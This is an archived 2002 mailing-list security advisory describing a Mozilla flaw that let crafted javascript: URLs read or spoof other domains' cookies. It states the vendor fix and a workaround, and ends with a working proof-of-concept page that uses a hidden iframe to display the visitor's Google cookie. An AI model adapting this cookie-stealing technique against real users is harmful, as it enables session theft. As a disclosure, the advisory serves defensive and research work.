Mozilla cookie stealing - Sandblad advisory #9

From: Andreas Sandblad (sandbladat_private)
Date: Wed Jul 24 2002 - 07:45:59 PDT

Next message: Mingyan Liu: "VMware GSX Server Remote Buffer Overflow"

Previous message: http-equivat_private: "[Full-Disclosure] REFRESH: EUDORA MAIL 5.1.1"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

                  - Sandblad advisory #9 -

---..---..---..---..---..---..---..---..---..---..---..---..----
Title:      Steal/spoof arbitrary cookie in Mozilla
Date:       [2002-07-24]
Software:   Mozilla
Vendor:     http://www.mozilla.org
Fix:        The author has been working with Mozilla
            to produce a patch. Problem is fixed in
            Mozilla 1.1 Beta released 02-07-22.
Workaround: Preferences->Advanced->Scripts & Plugins->
            Disable access to cookies using javascript
Impact:     Steal/spoof arbitrary cookie           _     _
            using javascript: URLs               o' \,=./ `o
Author:     Andreas Sandblad, sandbladat_private   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---


BACKGROUND:
===========

I orginally thought this was a XSS (cross site scripting) issue, but soon
came to the conclusion that it is limited to a design error in restricting
access to cookies. Even though Mozilla is open source, I have not been
studying the source code in order to find and exploit the vulnerability.

In the beginning I had problems not generating any javascript errors when
using the javascript URL. My first solution was to make the host and path
to be a valid javascript expression. Google.com may be a valid expression
if google is an object and com is an element/variable of the Google
object. Further on if Google.com is an int, it is legal to use google.com/
1. Parsing of host and path will stop when a space is found.

Well, I soon found a much easier solution. Simply put a // in front of the
host and path and a \n before the cookie reading code accour. The reason
why I didn't find this directly was because the newline must be created in
a javascript function. It can't be set directly in a javascript url.


DESCRIPTION:
============

Mozilla allows script in the javascript protocoll to set and read cookies.
For javascript URLs the host and path for the cookie is pulled out as:
"javascript:[host][path]"

Cookie security is based only on restricting access to correct matching
host and path. By carefully crafting a mallicious javascript URL opened in
a new frame/iframe/window, it is possible to access and alter cookies from
other domains.


DETAILS:
========

The easiest way to exploit the vulnerability is to simply create a
javascript URL in a javascript function as:
javascript://[host]/[path]\n[code to read cookie]
The // will make sure host and path don't generate any javascript errors.


EXPLOIT:
========

Instructions:
Put the exploit in a html document on a remote server and load it with
your Mozilla browser to activate the exploit.

-------------------------- CUT HERE ----------------------------
<pre>
Title:      Mozilla cookie stealing/spoofing
Date:       [2002-07-24]
Impact:     Steal/spoof arbitrary cookie           _     _
            using javascript: URLs               o' \,=./ `o
Author:     Andreas Sandblad, sandbladat_private   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
This demo will display your google cookie (must exist).
</pre>

<body onload=init()>
<iframe name=f height=0 width=0 style=visibility:hidden></iframe>
<script>
function init(){
  f.location = "javascript://www.google.com/\n"+
    "'<body onload=alert(document.cookie)>'";
}
</script>
-------------------------- CUT HERE ----------------------------


Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.


Old advisories:
===============
#8 [2002-07-23] "Pressing CTRL in IE is dangerous"
http://online.securityfocus.com/archive/1/283866
#7 [2002-05-19] "IE dot bug"
http://online.securityfocus.com/archive/1/273168
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561


Greetings:
==========
For feedback concerning this issue:
Ingesson, Quitta, Hawkan.
For feedback I forgot to thank for, regarding last advisory:
Tys0n-


Feedback:
=========
Please send suggestions and comments to:           _     _
sandbladat_private                              o' \,=./ `o
                                                    (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad,
student in Engineering Physics at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--

Next message: Mingyan Liu: "VMware GSX Server Remote Buffer Overflow"
Previous message: http-equivat_private: "[Full-Disclosure] REFRESH: EUDORA MAIL 5.1.1"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 08:10:20 PDT